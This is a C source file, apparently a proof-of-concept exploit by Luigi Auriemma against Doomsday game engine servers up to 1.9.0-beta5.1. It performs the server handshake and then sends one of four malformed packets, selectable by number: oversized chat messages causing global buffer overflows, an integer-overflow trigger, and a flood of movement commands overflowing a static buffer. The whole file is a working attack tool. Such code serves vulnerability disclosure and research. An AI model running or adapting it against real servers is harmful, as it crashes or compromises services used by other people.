/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>
#include "m_huffman.c"
#include "deng.h"
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define waitms  sleep
    #define ONESEC  1000
    typedef uint32_t    in_addr_t;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/times.h>

    #define waitms(x)   usleep(x * 1000);
    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0x3fff8     // this is almost the max for a packet filled with zeroes
#define PORT        13209



int putss(u8 *buff, u8 *data);
int putmm(u8 *buff, u8 *data, int len);
int putpt(u8 *dst, u8 *pat, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int rnds(u8 *data, int len, u32 *seed);
int sline(int sd, u8 *data);
int rline(int sd, u8 *data, int size);
int sdeng(int sd, u8 *data, int size);
int rdeng(int sd, u8 *data, int size);
int timeout(int sock);
in_addr_t resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     seed;
    int     sd,
            i,
            len,
            attack;
    u16     port    = PORT;
    u8      *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Doomsday <= 1.9.0-beta5.1 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = D_NetPlayerEvent global buffer-overflow using PKT_CHAT\n"
            " 2 = Msg_Write global buffer-overflow through PKT_CHAT\n"
            " 3 = integer overflow in PKT_CHAT\n"
            " 4 = static buffer-overflow in NetSv_ReadCommands\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    printf("- resolv %s", argv[2]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    printf(" -> %s:%hu\n", inet_ntoa(peer.sin_addr), port);

    printf("- connect...");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf("ok\n");

    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    seed = time(NULL);
    Huff_Init();

    p = buff;
    p += sprintf(p, "JOIN 3399 ");
    p += rnds(p, 68, &seed);
    p += sprintf(p, "\n");
    sline(sd, buff);
    len = rline(sd, buff, BUFFSZ);
    printf("  %.*s\n", len, buff);

    p = buff;
    p += putxx(p, 0,            16);
    p += putxx(p, PCL_HELLO,    8);
    p += putxx(p, seed,         32);
    sdeng(sd, buff, p - buff);
    len = rdeng(sd, buff, BUFFSZ);
    if(len > 0) show_dump(buff, len, stdout);

    p = buff;
    p += putxx(p, 0, 16);
    p += putxx(p, PKT_OK, 8);
    sdeng(sd, buff, p - buff);
    len = rdeng(sd, buff, BUFFSZ);
    if(len > 0) show_dump(buff, len, stdout);

    p = buff;
    p += putxx(p, 0, 16);

    if(attack == 1) {
        p += putxx(p, PKT_CHAT, 8);
        p += putxx(p, 0xff,     8);     // msgfrom
        p += putxx(p, 0xffff,   16);    // mask
        p += putpt(p, "A",      1300);  // message
        p += putxx(p, 0,        8);     // NULL byte

    } else if(attack == 2) {
        p += putxx(p, PKT_CHAT, 8);
        p += putxx(p, 0xff,     8);     // msgfrom
        p += putxx(p, 0xffff,   16);    // mask
        p += putpt(p, "A",      40000); // message
        p += putxx(p, 0,        8);     // NULL byte

    } else if(attack == 3) {
        p += putxx(p, PKT_CHAT, 8);

    } else if(attack == 4) {
        p += putxx(p, PCL_COMMANDS, 8);
        for(i = 0; i < 400; i++) {
            p += putxx(p, 0xff, 8);     // flags
            p += putxx(p, 'A',  8);     // CMDF_FORWARDMOVE
            p += putxx(p, 'A',  8);     // CMDF_SIDEMOVE
            p += putxx(p, 'A',  8);     // CMDF_ANGLE
            p += putxx(p, 'A',  8);     // CMDF_ANGLE (16 bit)
            p += putxx(p, 'A',  8);     //
            p += putxx(p, 'A',  8);     // CMDF_LOOKDIR (16 bit)
            p += putxx(p, 'A',  8);     //
            p += putxx(p, 'A',  8);     // CMDF_BUTTONS
            p += putxx(p, 'A',  8);     // CMDF_LOOKFLY
            p += putxx(p, 'A',  8);     // CMDF_ARTI
            p += putxx(p, 'A',  8);     // CMDF_CHANGE_WEAPON
        }

    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    sdeng(sd, buff, p - buff);

    printf("- receive data from the server (loop):\n");
    for(;;) {
        len = rdeng(sd, buff, BUFFSZ);
        if(len < 0) break;
        show_dump(buff, len, stdout);
    }

    close(sd);
    free(buff);
    return(0);
}



int putss(u8 *buff, u8 *data) {
    return(sprintf(buff, "%s", data) + 1);
}



int putmm(u8 *buff, u8 *data, int len) {
    strncpy(buff, data, len);
    return(len);
}



int putpt(u8 *dst, u8 *pat, int len) {
    int     patlen;
    u8      *p;

    patlen = (*pat) ? strlen(pat) : 1;
    p = dst;

    for(len /= patlen; len; len--) {
        memcpy(p, pat, patlen);
        p += patlen;
    }
    return(p - dst);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int rnds(u8 *data, int len, u32 *seed) {
    u32     rnd;
    u8      *p = data;
    static const u8 table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
    len = rnd % len;
    if(len < 3) len = 3;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



int sline(int sd, u8 *data) {
    return(send(sd, data, strlen(data), 0));
}



int rline(int sd, u8 *data, int size) {
    int     i,
            t;

    for(i = 0; i < size; i++) {
        t = recv(sd, data + i, 1, 0);
        if(t <= 0) return(-1);
        if(data[i] == '\n') break;
    }
    data[i] = 0;
    return(i);
}



int sdeng(int sd, u8 *data, int size) {
    int     len;
    u8      mini[2],
            *huff;

    huff = Huff_Encode(data, size, &len);
    if(len > 0xffff) {
        printf("\nError: the compressed output is more than 16 bit (%u)\n", len);
        exit(1);
    }
    mini[0] = len;
    mini[1] = len >> 8;
    if(send(sd, mini, 2,   0) != 2)   return(-1);
    if(send(sd, huff, len, 0) != len) return(-1);
    return(0);
}



int rdeng(int sd, u8 *data, int size) {
    int     t,
            i,
            len;
    u8      *huff;

    if(timeout(sd) < 0) return(-1);
    if(recv(sd, data,     1, 0) <= 0) return(-1);
    if(recv(sd, data + 1, 1, 0) <= 0) return(-1);
    len = data[0] | (data[1] << 8);

    for(i = 0; i < len; i += t) {
        t = recv(sd, data + i, len - i, 0);
        if(t <= 0) return(-1);
    }

    huff = Huff_Decode(data, len, &len);
    if(len > size) {
        printf("\nError: the uncompressed output %u is major than %u\n", len, size);
        exit(1);
    }
    memcpy(data, huff, len);
    return(len);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = 3;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



in_addr_t resolv(char *host) {
    struct      hostent *hp;
    in_addr_t   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(in_addr_t *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

